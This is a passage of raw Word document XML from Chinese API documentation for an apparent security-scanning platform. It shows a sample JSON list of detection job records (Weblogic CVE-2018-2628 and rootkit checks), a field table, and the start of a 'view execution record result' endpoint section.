        <w:t>"5d136b6925d8915db28cabc1"</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oups"</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agents"</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osTags"</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t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"cronEn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cron"</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startTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-06-26 20:56:08"</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DecValTok"/>
        </w:rPr>
        <w:t>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id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11f51025d891243fb540cb"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"jobId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11f50825d891243fb540c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eblogic反序列化漏洞(CVE-2018-2628)检测-20190625181834"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskRecordId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11f51025d891243fb540cc"</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ou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gent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osTags"</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t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"cronEn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cron"</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startTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-06-25 18:18:56"</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DecValTok"/>
        </w:rPr>
        <w:t>3</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1f50825d891243fb540c1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"jobId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11f50825d891243fb540c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eblogic反序列化漏洞(CVE-2018-2628)检测-20190625181834"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskRecordId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11f50825d891243fb540c2"</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oups"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>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agent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osTags"</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t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"cronEn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cron"</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startTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-06-25 18:18:48"</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DecValTok"/>
        </w:rPr>
        <w:t>3</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1bbc325d891243fb4be21"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"jobId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11bbc225d891243fb4be2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tkit快速任务检测-20190625141335"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskRecordId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11bbc325d891243fb4be22"</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grou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gents"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"190a788a48150865"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"422a580c5470c865"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"osTags"</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t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"cronEnable"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"cron"</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startTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-06-25 14:14:26"</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DecValTok"/>
        </w:rPr>
        <w:t>215</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DecValTok"/>
        </w:rPr>
        <w:t>3</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1bb4325d891243fb4be06"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"jobId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11bb4325d891243fb4be05"</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eblogic反序列化漏洞(CVE-2018-2628)检测-20190625141201"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"taskRecordId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11bb4325d891243fb4be07"</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ou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gent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osTags"</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t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"cronEn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cron"</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startTime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-06-25 14:12:19"</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DecValTok"/>
        </w:rPr>
        <w:t>3</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total"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"charts"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E173C8"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452"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="5288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="25199FA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22374B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75410E4E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BCEBC46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7FEAFB51" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="630F65F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60C6D44C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46CB4A37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业执行记录id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E0E482D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74B83C5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AF102B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B023092" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="18076913" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14F3B8FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskRecordId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="650CCF86" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37822D0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务执行记录id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6C62A88A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F56C276" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E6F0A6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34EFBE42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业执行范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4439DCCB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FE8A9AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cronEnable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BC208EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DDD0C9E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否开启定时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="221EE4A3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AD837F3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53E76E2C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="707A626D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cron定时表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="312CD67D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16361091" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33264BDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F39382C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业开始时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="17272653" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="202D3F78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>duration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02E8B211" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3403F6FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业扫描时间(单位s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="66B29C34" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53F60389" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FF28041" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="352EFD27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>作业状态 1.准备执行, 2.正在执行, 3.执行成功, 4.执行失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D1F6B54" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="203" w:name="查看执行记录结果"/>
      <w:bookmarkEnd w:id="202"/>
      <w:r>
        <w:t>查看执行记录结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696559B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702ED5F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/fastjob/job/task/result/{taskRecordId}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD2FF1B"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486"/>
        <w:gridCol w:w="1316"/>
        <w:gridCol w:w="5846"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2714501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C91863F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25D81E1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F0828DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
